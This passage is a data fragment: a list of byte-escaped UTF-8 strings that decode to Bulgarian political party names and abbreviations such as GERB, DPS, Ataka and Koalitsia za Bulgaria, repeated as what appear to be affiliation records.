'\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa1\xd0\x9a', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x90\xd0\xa2\xd0\x90\xd0\x9a\xd0\x90', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\xa1\xd0\x9a', '\xd0\x9a\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\xa0\xd0\x97\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x94\xd0\x9f\xd0\xa1', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x9a\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x93\xd0\x95\xd0\xa0\xd0\x91', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x90\xd1\x82\xd0\xb0\xd0\xba\xd0\xb0\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 \xd0\xbf\xd1\x80\xd0\xb0\xd0\xb2\xd0\xb0 \xd0\xb8 \xd1\x81\xd0\xb2\xd0\xbe\xd0\xb1\xd0\xbe\xd0\xb4\xd0\xb8\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9a\xd0\x9f \xe2\x80\x9e\xd0\x9a\xd0\xbe\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x86\xd0\xb8\xd1\x8f \xd0\xb7\xd0\xb0 \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x93\xd0\x95\xd0\xa0\xd0\x91\xe2\x80\x9c', '\xd0\x9f\xd0\x9f \xe2\x80\x9e\xd0\x94\xd0\xb2\xd0\xb8\xd0\xb6\xd0\xb5\xd0\xbd\xd0\xb8\xd0\xb5 \xd0\xb7\xd0\xb0 